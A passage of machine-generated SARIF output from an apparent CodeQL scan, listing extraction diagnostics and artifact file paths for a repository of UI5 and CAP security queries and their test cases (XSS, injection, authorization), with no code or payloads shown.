"%SRCROOT%", - "index" : 364 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 365 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 366 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 367 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 368 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 369 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 370 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 371 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 372 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 373 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 374 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 376 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 377 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 378 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 379 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 380 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 381 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 383 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 384 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 385 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 386 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 387 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 388 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 389 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 390 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 391 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 392 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 393 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 394 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 395 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 396 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 397 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 398 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 399 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 400 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 401 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 402 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 403 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 404 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 405 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 406 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 407 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 408 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 409 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 411 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 412 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "qlt.conf.json", - "uriBaseId" : "%SRCROOT%", - "index" : 413 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "scripts/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 414 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "scripts/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 415 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 416 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - } ], - "executionSuccessful" : true - } ], - "artifacts" : [ { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - } - }, { - "location" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - } - }, { - "location" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - } - }, { - "location" : { - "uri" : ".github/actions/install-codeql/action.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 5 - } - }, { - "location" : { - "uri" : ".github/actions/install-qlt/action.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 6 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 7 - } - }, { - "location" : { - "uri" : ".github/codeql/codeql-config.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 8 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 9 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 10 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 11 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 12 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 13 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 14 - } - }, { - "location" : { - "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 15 - } - }, { - "location" : { - "uri" : ".github/workflows/code_scanning.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 16 - } - }, { - "location" : { - "uri" : ".github/workflows/run-codeql-unit-tests-javascript.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 17 - } - }, { - "location" : { - "uri" : "codeql-workspace.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 18 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/lib/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 19 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 20 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/lib/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 21 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/src/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 22 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 23 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 24 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 25 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 26 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 27 - } - }, { - "location" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", - "uriBaseId" : 